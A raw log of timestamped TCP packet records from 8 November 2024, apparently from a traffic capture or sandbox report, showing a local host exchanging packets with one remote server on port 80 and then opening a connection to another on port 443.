Nov 8, 2024 12:02:30.633732080 CET	49717	80	192.168.2.9	147.45.44.131
Nov 8, 2024 12:02:30.633775949 CET	49717	80	192.168.2.9	147.45.44.131
Nov 8, 2024 12:02:30.633815050 CET	49717	80	192.168.2.9	147.45.44.131
Nov 8, 2024 12:02:30.634152889 CET	80	49717	147.45.44.131	192.168.2.9
Nov 8, 2024 12:02:30.634165049 CET	80	49717	147.45.44.131	192.168.2.9
Nov 8, 2024 12:02:30.634176016 CET	80	49717	147.45.44.131	192.168.2.9
Nov 8, 2024 12:02:30.634187937 CET	80	49717	147.45.44.131	192.168.2.9
Nov 8, 2024 12:02:30.634224892 CET	49717	80	192.168.2.9	147.45.44.131
Nov 8, 2024 12:02:30.634224892 CET	49717	80	192.168.2.9	147.45.44.131
Nov 8, 2024 12:02:30.634586096 CET	80	49717	147.45.44.131	192.168.2.9
Nov 8, 2024 12:02:30.634598017 CET	80	49717	147.45.44.131	192.168.2.9
Nov 8, 2024 12:02:30.634615898 CET	80	49717	147.45.44.131	192.168.2.9
Nov 8, 2024 12:02:30.634628057 CET	80	49717	147.45.44.131	192.168.2.9
Nov 8, 2024 12:02:30.634679079 CET	49717	80	192.168.2.9	147.45.44.131
Nov 8, 2024 12:02:30.634679079 CET	49717	80	192.168.2.9	147.45.44.131
Nov 8, 2024 12:02:30.719600916 CET	80	49717	147.45.44.131	192.168.2.9
Nov 8, 2024 12:02:30.719620943 CET	80	49717	147.45.44.131	192.168.2.9
Nov 8, 2024 12:02:30.719634056 CET	80	49717	147.45.44.131	192.168.2.9
Nov 8, 2024 12:02:30.719679117 CET	49717	80	192.168.2.9	147.45.44.131
Nov 8, 2024 12:02:30.752460003 CET	80	49717	147.45.44.131	192.168.2.9
Nov 8, 2024 12:02:30.752485037 CET	80	49717	147.45.44.131	192.168.2.9
Nov 8, 2024 12:02:30.752499104 CET	80	49717	147.45.44.131	192.168.2.9
Nov 8, 2024 12:02:30.752511024 CET	80	49717	147.45.44.131	192.168.2.9
Nov 8, 2024 12:02:30.752522945 CET	80	49717	147.45.44.131	192.168.2.9
Nov 8, 2024 12:02:30.752528906 CET	80	49717	147.45.44.131	192.168.2.9
Nov 8, 2024 12:02:30.752535105 CET	80	49717	147.45.44.131	192.168.2.9
Nov 8, 2024 12:02:30.752546072 CET	80	49717	147.45.44.131	192.168.2.9
Nov 8, 2024 12:02:30.752559900 CET	80	49717	147.45.44.131	192.168.2.9
Nov 8, 2024 12:02:30.752582073 CET	49717	80	192.168.2.9	147.45.44.131
Nov 8, 2024 12:02:30.752652884 CET	49717	80	192.168.2.9	147.45.44.131
Nov 8, 2024 12:02:30.753273964 CET	80	49717	147.45.44.131	192.168.2.9
Nov 8, 2024 12:02:30.753290892 CET	80	49717	147.45.44.131	192.168.2.9
Nov 8, 2024 12:02:30.753340006 CET	49717	80	192.168.2.9	147.45.44.131
Nov 8, 2024 12:02:30.753456116 CET	80	49717	147.45.44.131	192.168.2.9
Nov 8, 2024 12:02:30.753468990 CET	80	49717	147.45.44.131	192.168.2.9
Nov 8, 2024 12:02:30.753479958 CET	80	49717	147.45.44.131	192.168.2.9
Nov 8, 2024 12:02:30.753492117 CET	80	49717	147.45.44.131	192.168.2.9
Nov 8, 2024 12:02:30.753495932 CET	49717	80	192.168.2.9	147.45.44.131
Nov 8, 2024 12:02:30.753525019 CET	49717	80	192.168.2.9	147.45.44.131
Nov 8, 2024 12:02:30.838479996 CET	80	49717	147.45.44.131	192.168.2.9
Nov 8, 2024 12:02:30.838496923 CET	80	49717	147.45.44.131	192.168.2.9
Nov 8, 2024 12:02:30.838512897 CET	80	49717	147.45.44.131	192.168.2.9
Nov 8, 2024 12:02:30.838568926 CET	49717	80	192.168.2.9	147.45.44.131
Nov 8, 2024 12:02:30.870862961 CET	80	49717	147.45.44.131	192.168.2.9
Nov 8, 2024 12:02:30.870886087 CET	80	49717	147.45.44.131	192.168.2.9
Nov 8, 2024 12:02:30.870898008 CET	80	49717	147.45.44.131	192.168.2.9
Nov 8, 2024 12:02:30.871042013 CET	49717	80	192.168.2.9	147.45.44.131
Nov 8, 2024 12:02:30.871138096 CET	80	49717	147.45.44.131	192.168.2.9
Nov 8, 2024 12:02:30.871150970 CET	80	49717	147.45.44.131	192.168.2.9
Nov 8, 2024 12:02:30.871161938 CET	80	49717	147.45.44.131	192.168.2.9
Nov 8, 2024 12:02:30.871192932 CET	80	49717	147.45.44.131	192.168.2.9
Nov 8, 2024 12:02:30.871193886 CET	49717	80	192.168.2.9	147.45.44.131
Nov 8, 2024 12:02:30.871207952 CET	80	49717	147.45.44.131	192.168.2.9
Nov 8, 2024 12:02:30.871220112 CET	80	49717	147.45.44.131	192.168.2.9
Nov 8, 2024 12:02:30.871236086 CET	49717	80	192.168.2.9	147.45.44.131
Nov 8, 2024 12:02:30.871258020 CET	49717	80	192.168.2.9	147.45.44.131
Nov 8, 2024 12:02:30.871979952 CET	80	49717	147.45.44.131	192.168.2.9
Nov 8, 2024 12:02:30.872034073 CET	80	49717	147.45.44.131	192.168.2.9
Nov 8, 2024 12:02:30.872056007 CET	80	49717	147.45.44.131	192.168.2.9
Nov 8, 2024 12:02:30.872068882 CET	80	49717	147.45.44.131	192.168.2.9
Nov 8, 2024 12:02:30.872078896 CET	80	49717	147.45.44.131	192.168.2.9
Nov 8, 2024 12:02:30.872080088 CET	49717	80	192.168.2.9	147.45.44.131
Nov 8, 2024 12:02:30.872102022 CET	49717	80	192.168.2.9	147.45.44.131
Nov 8, 2024 12:02:30.919442892 CET	49717	80	192.168.2.9	147.45.44.131
Nov 8, 2024 12:02:30.957412958 CET	80	49717	147.45.44.131	192.168.2.9
Nov 8, 2024 12:02:30.957510948 CET	80	49717	147.45.44.131	192.168.2.9
Nov 8, 2024 12:02:30.957521915 CET	80	49717	147.45.44.131	192.168.2.9
Nov 8, 2024 12:02:30.957534075 CET	80	49717	147.45.44.131	192.168.2.9
Nov 8, 2024 12:02:30.957597971 CET	49717	80	192.168.2.9	147.45.44.131
Nov 8, 2024 12:02:30.957628965 CET	49717	80	192.168.2.9	147.45.44.131
Nov 8, 2024 12:02:30.989768982 CET	80	49717	147.45.44.131	192.168.2.9
Nov 8, 2024 12:02:30.989794016 CET	80	49717	147.45.44.131	192.168.2.9
Nov 8, 2024 12:02:30.989814043 CET	80	49717	147.45.44.131	192.168.2.9
Nov 8, 2024 12:02:30.989865065 CET	49717	80	192.168.2.9	147.45.44.131
Nov 8, 2024 12:02:30.989866972 CET	80	49717	147.45.44.131	192.168.2.9
Nov 8, 2024 12:02:30.989881039 CET	80	49717	147.45.44.131	192.168.2.9
Nov 8, 2024 12:02:30.989898920 CET	80	49717	147.45.44.131	192.168.2.9
Nov 8, 2024 12:02:30.989913940 CET	49717	80	192.168.2.9	147.45.44.131
Nov 8, 2024 12:02:30.989945889 CET	49717	80	192.168.2.9	147.45.44.131
Nov 8, 2024 12:02:30.990294933 CET	80	49717	147.45.44.131	192.168.2.9
Nov 8, 2024 12:02:30.990336895 CET	80	49717	147.45.44.131	192.168.2.9
Nov 8, 2024 12:02:30.990381002 CET	49717	80	192.168.2.9	147.45.44.131
Nov 8, 2024 12:02:30.990422010 CET	80	49717	147.45.44.131	192.168.2.9
Nov 8, 2024 12:02:30.990442038 CET	80	49717	147.45.44.131	192.168.2.9
Nov 8, 2024 12:02:30.990456104 CET	80	49717	147.45.44.131	192.168.2.9
Nov 8, 2024 12:02:30.990479946 CET	49717	80	192.168.2.9	147.45.44.131
Nov 8, 2024 12:02:30.990537882 CET	80	49717	147.45.44.131	192.168.2.9
Nov 8, 2024 12:02:30.990550041 CET	80	49717	147.45.44.131	192.168.2.9
Nov 8, 2024 12:02:30.990576029 CET	49717	80	192.168.2.9	147.45.44.131
Nov 8, 2024 12:02:30.991282940 CET	80	49717	147.45.44.131	192.168.2.9
Nov 8, 2024 12:02:30.991305113 CET	80	49717	147.45.44.131	192.168.2.9
Nov 8, 2024 12:02:30.991322994 CET	80	49717	147.45.44.131	192.168.2.9
Nov 8, 2024 12:02:30.991329908 CET	49717	80	192.168.2.9	147.45.44.131
Nov 8, 2024 12:02:30.991364956 CET	49717	80	192.168.2.9	147.45.44.131
Nov 8, 2024 12:02:31.076069117 CET	80	49717	147.45.44.131	192.168.2.9
Nov 8, 2024 12:02:31.076154947 CET	80	49717	147.45.44.131	192.168.2.9
Nov 8, 2024 12:02:31.076165915 CET	80	49717	147.45.44.131	192.168.2.9
Nov 8, 2024 12:02:31.076176882 CET	80	49717	147.45.44.131	192.168.2.9
Nov 8, 2024 12:02:31.076199055 CET	49717	80	192.168.2.9	147.45.44.131
Nov 8, 2024 12:02:31.076237917 CET	49717	80	192.168.2.9	147.45.44.131
Nov 8, 2024 12:02:31.109035969 CET	80	49717	147.45.44.131	192.168.2.9
Nov 8, 2024 12:02:31.109066963 CET	80	49717	147.45.44.131	192.168.2.9
Nov 8, 2024 12:02:31.109081984 CET	80	49717	147.45.44.131	192.168.2.9
Nov 8, 2024 12:02:31.109093904 CET	80	49717	147.45.44.131	192.168.2.9
Nov 8, 2024 12:02:31.109106064 CET	80	49717	147.45.44.131	192.168.2.9
Nov 8, 2024 12:02:31.109118938 CET	80	49717	147.45.44.131	192.168.2.9
Nov 8, 2024 12:02:31.109133005 CET	80	49717	147.45.44.131	192.168.2.9
Nov 8, 2024 12:02:31.109158993 CET	49717	80	192.168.2.9	147.45.44.131
Nov 8, 2024 12:02:31.109225035 CET	49717	80	192.168.2.9	147.45.44.131
Nov 8, 2024 12:02:31.109497070 CET	80	49717	147.45.44.131	192.168.2.9
Nov 8, 2024 12:02:31.109508991 CET	80	49717	147.45.44.131	192.168.2.9
Nov 8, 2024 12:02:31.109520912 CET	80	49717	147.45.44.131	192.168.2.9
Nov 8, 2024 12:02:31.109545946 CET	49717	80	192.168.2.9	147.45.44.131
Nov 8, 2024 12:02:31.109553099 CET	80	49717	147.45.44.131	192.168.2.9
Nov 8, 2024 12:02:31.109568119 CET	80	49717	147.45.44.131	192.168.2.9
Nov 8, 2024 12:02:31.109568119 CET	49717	80	192.168.2.9	147.45.44.131
Nov 8, 2024 12:02:31.109580994 CET	80	49717	147.45.44.131	192.168.2.9
Nov 8, 2024 12:02:31.109594107 CET	80	49717	147.45.44.131	192.168.2.9
Nov 8, 2024 12:02:31.109605074 CET	49717	80	192.168.2.9	147.45.44.131
Nov 8, 2024 12:02:31.109649897 CET	49717	80	192.168.2.9	147.45.44.131
Nov 8, 2024 12:02:31.110407114 CET	80	49717	147.45.44.131	192.168.2.9
Nov 8, 2024 12:02:31.110486984 CET	80	49717	147.45.44.131	192.168.2.9
Nov 8, 2024 12:02:31.110531092 CET	49717	80	192.168.2.9	147.45.44.131
Nov 8, 2024 12:02:31.194732904 CET	80	49717	147.45.44.131	192.168.2.9
Nov 8, 2024 12:02:31.194814920 CET	80	49717	147.45.44.131	192.168.2.9
Nov 8, 2024 12:02:31.194873095 CET	49717	80	192.168.2.9	147.45.44.131
Nov 8, 2024 12:02:31.227169991 CET	80	49717	147.45.44.131	192.168.2.9
Nov 8, 2024 12:02:31.227185011 CET	80	49717	147.45.44.131	192.168.2.9
Nov 8, 2024 12:02:31.227195978 CET	80	49717	147.45.44.131	192.168.2.9
Nov 8, 2024 12:02:31.227237940 CET	49717	80	192.168.2.9	147.45.44.131
Nov 8, 2024 12:02:31.227303982 CET	80	49717	147.45.44.131	192.168.2.9
Nov 8, 2024 12:02:31.227346897 CET	49717	80	192.168.2.9	147.45.44.131
Nov 8, 2024 12:02:31.227376938 CET	80	49717	147.45.44.131	192.168.2.9
Nov 8, 2024 12:02:31.227396965 CET	80	49717	147.45.44.131	192.168.2.9
Nov 8, 2024 12:02:31.227411032 CET	80	49717	147.45.44.131	192.168.2.9
Nov 8, 2024 12:02:31.227421999 CET	80	49717	147.45.44.131	192.168.2.9
Nov 8, 2024 12:02:31.227436066 CET	49717	80	192.168.2.9	147.45.44.131
Nov 8, 2024 12:02:31.227467060 CET	49717	80	192.168.2.9	147.45.44.131
Nov 8, 2024 12:02:31.228039026 CET	80	49717	147.45.44.131	192.168.2.9
Nov 8, 2024 12:02:31.228066921 CET	80	49717	147.45.44.131	192.168.2.9
Nov 8, 2024 12:02:31.228076935 CET	80	49717	147.45.44.131	192.168.2.9
Nov 8, 2024 12:02:31.228102922 CET	49717	80	192.168.2.9	147.45.44.131
Nov 8, 2024 12:02:31.228279114 CET	80	49717	147.45.44.131	192.168.2.9
Nov 8, 2024 12:02:31.228318930 CET	49717	80	192.168.2.9	147.45.44.131
Nov 8, 2024 12:02:31.228332043 CET	80	49717	147.45.44.131	192.168.2.9
Nov 8, 2024 12:02:31.228346109 CET	80	49717	147.45.44.131	192.168.2.9
Nov 8, 2024 12:02:31.228375912 CET	49717	80	192.168.2.9	147.45.44.131
Nov 8, 2024 12:02:31.228377104 CET	80	49717	147.45.44.131	192.168.2.9
Nov 8, 2024 12:02:31.228782892 CET	80	49717	147.45.44.131	192.168.2.9
Nov 8, 2024 12:02:31.228822947 CET	49717	80	192.168.2.9	147.45.44.131
Nov 8, 2024 12:02:31.228863955 CET	80	49717	147.45.44.131	192.168.2.9
Nov 8, 2024 12:02:31.228876114 CET	80	49717	147.45.44.131	192.168.2.9
Nov 8, 2024 12:02:31.228887081 CET	80	49717	147.45.44.131	192.168.2.9
Nov 8, 2024 12:02:31.228913069 CET	49717	80	192.168.2.9	147.45.44.131
Nov 8, 2024 12:02:31.278827906 CET	49717	80	192.168.2.9	147.45.44.131
Nov 8, 2024 12:02:31.313405991 CET	80	49717	147.45.44.131	192.168.2.9
Nov 8, 2024 12:02:31.313468933 CET	80	49717	147.45.44.131	192.168.2.9
Nov 8, 2024 12:02:31.313482046 CET	80	49717	147.45.44.131	192.168.2.9
Nov 8, 2024 12:02:31.313493013 CET	80	49717	147.45.44.131	192.168.2.9
Nov 8, 2024 12:02:31.313529015 CET	49717	80	192.168.2.9	147.45.44.131
Nov 8, 2024 12:02:31.313568115 CET	49717	80	192.168.2.9	147.45.44.131
Nov 8, 2024 12:02:31.346261024 CET	80	49717	147.45.44.131	192.168.2.9
Nov 8, 2024 12:02:31.346280098 CET	80	49717	147.45.44.131	192.168.2.9
Nov 8, 2024 12:02:31.346295118 CET	80	49717	147.45.44.131	192.168.2.9
Nov 8, 2024 12:02:31.346318007 CET	80	49717	147.45.44.131	192.168.2.9
Nov 8, 2024 12:02:31.346328974 CET	80	49717	147.45.44.131	192.168.2.9
Nov 8, 2024 12:02:31.346339941 CET	80	49717	147.45.44.131	192.168.2.9
Nov 8, 2024 12:02:31.346338987 CET	49717	80	192.168.2.9	147.45.44.131
Nov 8, 2024 12:02:31.346354008 CET	80	49717	147.45.44.131	192.168.2.9
Nov 8, 2024 12:02:31.346369028 CET	49717	80	192.168.2.9	147.45.44.131
Nov 8, 2024 12:02:31.346395016 CET	49717	80	192.168.2.9	147.45.44.131
Nov 8, 2024 12:02:31.346667051 CET	80	49717	147.45.44.131	192.168.2.9
Nov 8, 2024 12:02:31.346679926 CET	80	49717	147.45.44.131	192.168.2.9
Nov 8, 2024 12:02:31.346690893 CET	80	49717	147.45.44.131	192.168.2.9
Nov 8, 2024 12:02:31.346714020 CET	49717	80	192.168.2.9	147.45.44.131
Nov 8, 2024 12:02:31.346731901 CET	49717	80	192.168.2.9	147.45.44.131
Nov 8, 2024 12:02:31.347019911 CET	80	49717	147.45.44.131	192.168.2.9
Nov 8, 2024 12:02:31.347043037 CET	80	49717	147.45.44.131	192.168.2.9
Nov 8, 2024 12:02:31.347054958 CET	80	49717	147.45.44.131	192.168.2.9
Nov 8, 2024 12:02:31.347067118 CET	80	49717	147.45.44.131	192.168.2.9
Nov 8, 2024 12:02:31.347079039 CET	80	49717	147.45.44.131	192.168.2.9
Nov 8, 2024 12:02:31.347084999 CET	49717	80	192.168.2.9	147.45.44.131
Nov 8, 2024 12:02:31.347098112 CET	49717	80	192.168.2.9	147.45.44.131
Nov 8, 2024 12:02:31.388195038 CET	49717	80	192.168.2.9	147.45.44.131
Nov 8, 2024 12:02:31.388330936 CET	80	49717	147.45.44.131	192.168.2.9
Nov 8, 2024 12:02:31.388411999 CET	80	49717	147.45.44.131	192.168.2.9
Nov 8, 2024 12:02:31.388423920 CET	80	49717	147.45.44.131	192.168.2.9
Nov 8, 2024 12:02:31.388452053 CET	49717	80	192.168.2.9	147.45.44.131
Nov 8, 2024 12:02:31.432298899 CET	80	49717	147.45.44.131	192.168.2.9
Nov 8, 2024 12:02:31.432315111 CET	80	49717	147.45.44.131	192.168.2.9
Nov 8, 2024 12:02:31.432327032 CET	80	49717	147.45.44.131	192.168.2.9
Nov 8, 2024 12:02:31.432353973 CET	49717	80	192.168.2.9	147.45.44.131
Nov 8, 2024 12:02:31.432403088 CET	49717	80	192.168.2.9	147.45.44.131
Nov 8, 2024 12:02:31.464956045 CET	80	49717	147.45.44.131	192.168.2.9
Nov 8, 2024 12:02:31.464998960 CET	80	49717	147.45.44.131	192.168.2.9
Nov 8, 2024 12:02:31.465010881 CET	80	49717	147.45.44.131	192.168.2.9
Nov 8, 2024 12:02:31.465037107 CET	49717	80	192.168.2.9	147.45.44.131
Nov 8, 2024 12:02:31.465049982 CET	80	49717	147.45.44.131	192.168.2.9
Nov 8, 2024 12:02:31.465061903 CET	80	49717	147.45.44.131	192.168.2.9
Nov 8, 2024 12:02:31.465090036 CET	49717	80	192.168.2.9	147.45.44.131
Nov 8, 2024 12:02:31.465239048 CET	80	49717	147.45.44.131	192.168.2.9
Nov 8, 2024 12:02:31.465261936 CET	80	49717	147.45.44.131	192.168.2.9
Nov 8, 2024 12:02:31.465272903 CET	80	49717	147.45.44.131	192.168.2.9
Nov 8, 2024 12:02:31.465274096 CET	49717	80	192.168.2.9	147.45.44.131
Nov 8, 2024 12:02:31.465326071 CET	49717	80	192.168.2.9	147.45.44.131
Nov 8, 2024 12:02:31.465329885 CET	80	49717	147.45.44.131	192.168.2.9
Nov 8, 2024 12:02:31.465342999 CET	80	49717	147.45.44.131	192.168.2.9
Nov 8, 2024 12:02:31.465368986 CET	49717	80	192.168.2.9	147.45.44.131
Nov 8, 2024 12:02:31.465897083 CET	80	49717	147.45.44.131	192.168.2.9
Nov 8, 2024 12:02:31.465912104 CET	80	49717	147.45.44.131	192.168.2.9
Nov 8, 2024 12:02:31.465924025 CET	80	49717	147.45.44.131	192.168.2.9
Nov 8, 2024 12:02:31.465945005 CET	49717	80	192.168.2.9	147.45.44.131
Nov 8, 2024 12:02:31.466176033 CET	80	49717	147.45.44.131	192.168.2.9
Nov 8, 2024 12:02:31.466192007 CET	80	49717	147.45.44.131	192.168.2.9
Nov 8, 2024 12:02:31.466203928 CET	80	49717	147.45.44.131	192.168.2.9
Nov 8, 2024 12:02:31.466218948 CET	49717	80	192.168.2.9	147.45.44.131
Nov 8, 2024 12:02:31.466245890 CET	49717	80	192.168.2.9	147.45.44.131
Nov 8, 2024 12:02:31.506987095 CET	80	49717	147.45.44.131	192.168.2.9
Nov 8, 2024 12:02:31.507004023 CET	80	49717	147.45.44.131	192.168.2.9
Nov 8, 2024 12:02:31.507015944 CET	80	49717	147.45.44.131	192.168.2.9
Nov 8, 2024 12:02:31.507060051 CET	49717	80	192.168.2.9	147.45.44.131
Nov 8, 2024 12:02:31.551517010 CET	80	49717	147.45.44.131	192.168.2.9
Nov 8, 2024 12:02:31.551565886 CET	80	49717	147.45.44.131	192.168.2.9
Nov 8, 2024 12:02:31.551577091 CET	80	49717	147.45.44.131	192.168.2.9
Nov 8, 2024 12:02:31.551605940 CET	49717	80	192.168.2.9	147.45.44.131
Nov 8, 2024 12:02:31.551645994 CET	49717	80	192.168.2.9	147.45.44.131
Nov 8, 2024 12:02:31.583719969 CET	80	49717	147.45.44.131	192.168.2.9
Nov 8, 2024 12:02:31.583766937 CET	80	49717	147.45.44.131	192.168.2.9
Nov 8, 2024 12:02:31.583786964 CET	80	49717	147.45.44.131	192.168.2.9
Nov 8, 2024 12:02:31.583801031 CET	80	49717	147.45.44.131	192.168.2.9
Nov 8, 2024 12:02:31.583811998 CET	80	49717	147.45.44.131	192.168.2.9
Nov 8, 2024 12:02:31.583813906 CET	49717	80	192.168.2.9	147.45.44.131
Nov 8, 2024 12:02:31.583854914 CET	49717	80	192.168.2.9	147.45.44.131
Nov 8, 2024 12:02:31.584014893 CET	80	49717	147.45.44.131	192.168.2.9
Nov 8, 2024 12:02:31.584052086 CET	49717	80	192.168.2.9	147.45.44.131
Nov 8, 2024 12:02:31.584076881 CET	80	49717	147.45.44.131	192.168.2.9
Nov 8, 2024 12:02:31.584096909 CET	80	49717	147.45.44.131	192.168.2.9
Nov 8, 2024 12:02:31.584114075 CET	80	49717	147.45.44.131	192.168.2.9
Nov 8, 2024 12:02:31.584122896 CET	80	49717	147.45.44.131	192.168.2.9
Nov 8, 2024 12:02:31.584135056 CET	49717	80	192.168.2.9	147.45.44.131
Nov 8, 2024 12:02:31.584156990 CET	49717	80	192.168.2.9	147.45.44.131
Nov 8, 2024 12:02:31.584666014 CET	80	49717	147.45.44.131	192.168.2.9
Nov 8, 2024 12:02:31.584726095 CET	80	49717	147.45.44.131	192.168.2.9
Nov 8, 2024 12:02:31.584738016 CET	80	49717	147.45.44.131	192.168.2.9
Nov 8, 2024 12:02:31.584763050 CET	49717	80	192.168.2.9	147.45.44.131
Nov 8, 2024 12:02:31.584778070 CET	80	49717	147.45.44.131	192.168.2.9
Nov 8, 2024 12:02:31.584814072 CET	49717	80	192.168.2.9	147.45.44.131
Nov 8, 2024 12:02:31.584860086 CET	80	49717	147.45.44.131	192.168.2.9
Nov 8, 2024 12:02:31.584871054 CET	80	49717	147.45.44.131	192.168.2.9
Nov 8, 2024 12:02:31.584882021 CET	80	49717	147.45.44.131	192.168.2.9
Nov 8, 2024 12:02:31.584898949 CET	49717	80	192.168.2.9	147.45.44.131
Nov 8, 2024 12:02:31.585470915 CET	80	49717	147.45.44.131	192.168.2.9
Nov 8, 2024 12:02:31.585510015 CET	49717	80	192.168.2.9	147.45.44.131
Nov 8, 2024 12:02:31.625720978 CET	80	49717	147.45.44.131	192.168.2.9
Nov 8, 2024 12:02:31.625740051 CET	80	49717	147.45.44.131	192.168.2.9
Nov 8, 2024 12:02:31.625799894 CET	49717	80	192.168.2.9	147.45.44.131
Nov 8, 2024 12:02:31.626082897 CET	80	49717	147.45.44.131	192.168.2.9
Nov 8, 2024 12:02:31.626107931 CET	80	49717	147.45.44.131	192.168.2.9
Nov 8, 2024 12:02:31.626147032 CET	49717	80	192.168.2.9	147.45.44.131
Nov 8, 2024 12:02:31.670265913 CET	80	49717	147.45.44.131	192.168.2.9
Nov 8, 2024 12:02:31.670291901 CET	80	49717	147.45.44.131	192.168.2.9
Nov 8, 2024 12:02:31.670304060 CET	80	49717	147.45.44.131	192.168.2.9
Nov 8, 2024 12:02:31.670362949 CET	49717	80	192.168.2.9	147.45.44.131
Nov 8, 2024 12:02:31.702461004 CET	80	49717	147.45.44.131	192.168.2.9
Nov 8, 2024 12:02:31.702544928 CET	49717	80	192.168.2.9	147.45.44.131
Nov 8, 2024 12:02:31.702549934 CET	80	49717	147.45.44.131	192.168.2.9
Nov 8, 2024 12:02:31.702630997 CET	80	49717	147.45.44.131	192.168.2.9
Nov 8, 2024 12:02:31.702642918 CET	80	49717	147.45.44.131	192.168.2.9
Nov 8, 2024 12:02:31.702655077 CET	80	49717	147.45.44.131	192.168.2.9
Nov 8, 2024 12:02:31.702666998 CET	49717	80	192.168.2.9	147.45.44.131
Nov 8, 2024 12:02:31.702697992 CET	49717	80	192.168.2.9	147.45.44.131
Nov 8, 2024 12:02:31.702775955 CET	80	49717	147.45.44.131	192.168.2.9
Nov 8, 2024 12:02:31.702786922 CET	80	49717	147.45.44.131	192.168.2.9
Nov 8, 2024 12:02:31.702794075 CET	80	49717	147.45.44.131	192.168.2.9
Nov 8, 2024 12:02:31.702815056 CET	80	49717	147.45.44.131	192.168.2.9
Nov 8, 2024 12:02:31.702824116 CET	49717	80	192.168.2.9	147.45.44.131
Nov 8, 2024 12:02:31.702857018 CET	49717	80	192.168.2.9	147.45.44.131
Nov 8, 2024 12:02:31.703212976 CET	80	49717	147.45.44.131	192.168.2.9
Nov 8, 2024 12:02:31.703262091 CET	80	49717	147.45.44.131	192.168.2.9
Nov 8, 2024 12:02:31.703274012 CET	80	49717	147.45.44.131	192.168.2.9
Nov 8, 2024 12:02:31.703294039 CET	49717	80	192.168.2.9	147.45.44.131
Nov 8, 2024 12:02:31.703295946 CET	80	49717	147.45.44.131	192.168.2.9
Nov 8, 2024 12:02:31.703309059 CET	80	49717	147.45.44.131	192.168.2.9
Nov 8, 2024 12:02:31.703325033 CET	80	49717	147.45.44.131	192.168.2.9
Nov 8, 2024 12:02:31.703329086 CET	49717	80	192.168.2.9	147.45.44.131
Nov 8, 2024 12:02:31.703361988 CET	49717	80	192.168.2.9	147.45.44.131
Nov 8, 2024 12:02:31.703936100 CET	80	49717	147.45.44.131	192.168.2.9
Nov 8, 2024 12:02:31.703989029 CET	80	49717	147.45.44.131	192.168.2.9
Nov 8, 2024 12:02:31.704031944 CET	49717	80	192.168.2.9	147.45.44.131
Nov 8, 2024 12:02:31.704065084 CET	80	49717	147.45.44.131	192.168.2.9
Nov 8, 2024 12:02:31.704123974 CET	80	49717	147.45.44.131	192.168.2.9
Nov 8, 2024 12:02:31.704137087 CET	80	49717	147.45.44.131	192.168.2.9
Nov 8, 2024 12:02:31.704157114 CET	49717	80	192.168.2.9	147.45.44.131
Nov 8, 2024 12:02:31.747642040 CET	49717	80	192.168.2.9	147.45.44.131
Nov 8, 2024 12:02:31.757798910 CET	80	49717	147.45.44.131	192.168.2.9
Nov 8, 2024 12:02:31.757823944 CET	80	49717	147.45.44.131	192.168.2.9
Nov 8, 2024 12:02:31.757837057 CET	80	49717	147.45.44.131	192.168.2.9
Nov 8, 2024 12:02:31.757909060 CET	49717	80	192.168.2.9	147.45.44.131
Nov 8, 2024 12:02:31.788996935 CET	80	49717	147.45.44.131	192.168.2.9
Nov 8, 2024 12:02:31.789031029 CET	80	49717	147.45.44.131	192.168.2.9
Nov 8, 2024 12:02:31.789041996 CET	80	49717	147.45.44.131	192.168.2.9
Nov 8, 2024 12:02:31.789062023 CET	49717	80	192.168.2.9	147.45.44.131
Nov 8, 2024 12:02:31.789082050 CET	49717	80	192.168.2.9	147.45.44.131
Nov 8, 2024 12:02:31.821533918 CET	80	49717	147.45.44.131	192.168.2.9
Nov 8, 2024 12:02:31.821603060 CET	80	49717	147.45.44.131	192.168.2.9
Nov 8, 2024 12:02:31.821619034 CET	80	49717	147.45.44.131	192.168.2.9
Nov 8, 2024 12:02:31.821662903 CET	49717	80	192.168.2.9	147.45.44.131
Nov 8, 2024 12:02:31.821679115 CET	80	49717	147.45.44.131	192.168.2.9
Nov 8, 2024 12:02:31.821692944 CET	80	49717	147.45.44.131	192.168.2.9
Nov 8, 2024 12:02:31.821706057 CET	80	49717	147.45.44.131	192.168.2.9
Nov 8, 2024 12:02:31.821713924 CET	80	49717	147.45.44.131	192.168.2.9
Nov 8, 2024 12:02:31.821717978 CET	49717	80	192.168.2.9	147.45.44.131
Nov 8, 2024 12:02:31.821738005 CET	49717	80	192.168.2.9	147.45.44.131
Nov 8, 2024 12:02:31.822022915 CET	80	49717	147.45.44.131	192.168.2.9
Nov 8, 2024 12:02:31.822036982 CET	80	49717	147.45.44.131	192.168.2.9
Nov 8, 2024 12:02:31.822048903 CET	80	49717	147.45.44.131	192.168.2.9
Nov 8, 2024 12:02:31.822069883 CET	49717	80	192.168.2.9	147.45.44.131
Nov 8, 2024 12:02:31.822094917 CET	49717	80	192.168.2.9	147.45.44.131
Nov 8, 2024 12:02:31.822113991 CET	80	49717	147.45.44.131	192.168.2.9
Nov 8, 2024 12:02:31.822127104 CET	80	49717	147.45.44.131	192.168.2.9
Nov 8, 2024 12:02:31.822139025 CET	80	49717	147.45.44.131	192.168.2.9
Nov 8, 2024 12:02:31.822151899 CET	80	49717	147.45.44.131	192.168.2.9
Nov 8, 2024 12:02:31.822168112 CET	49717	80	192.168.2.9	147.45.44.131
Nov 8, 2024 12:02:31.822200060 CET	49717	80	192.168.2.9	147.45.44.131
Nov 8, 2024 12:02:31.822885036 CET	80	49717	147.45.44.131	192.168.2.9
Nov 8, 2024 12:02:31.872561932 CET	49717	80	192.168.2.9	147.45.44.131
Nov 8, 2024 12:02:32.442572117 CET	49717	80	192.168.2.9	147.45.44.131
Nov 8, 2024 12:02:32.556843042 CET	49738	443	192.168.2.9	172.67.187.9
Nov 8, 2024 12:02:32.556875944 CET	443	49738	172.67.187.9	192.168.2.9
Nov 8, 2024 12:02:32.556947947 CET	49738	443	192.168.2.9	172.67.187.9
Nov 8, 2024 12:02:32.560281992 CET	49738	443	192.168.2.9	172.67.187.9
Nov 8, 2024 12:02:32.560295105 CET	443	49738	172.67.187.9	192.168.2.9
Nov 8, 2024 12:02:33.172940969 CET	443	49738	172.67.187.9	192.168.2.9
Nov 8, 2024 12:02:33.173108101 CET	49738	443	192.168.2.9	172.67.187.9
Nov 8, 2024 12:02:33.176753044 CET	49738	443	192.168.2.9	172.67.187.9
Nov 8, 2024 12:02:33.176759005 CET	443	49738	172.67.187.9	192.168.2.9
Nov 8, 2024 12:02:33.177009106 CET	443	49738	172.67.187.9	192.168.2.9
Nov 8, 2024 12:02:33.219496012 CET	49738	443	192.168.2.9	172.67.187.9
Nov 8, 2024 12:02:33.225944042 CET	49738	443	192.168.2.9	172.67.187.9
Nov 8, 2024 12:02:33.225944042 CET	49738	443	192.168.2.9	172.67.187.9
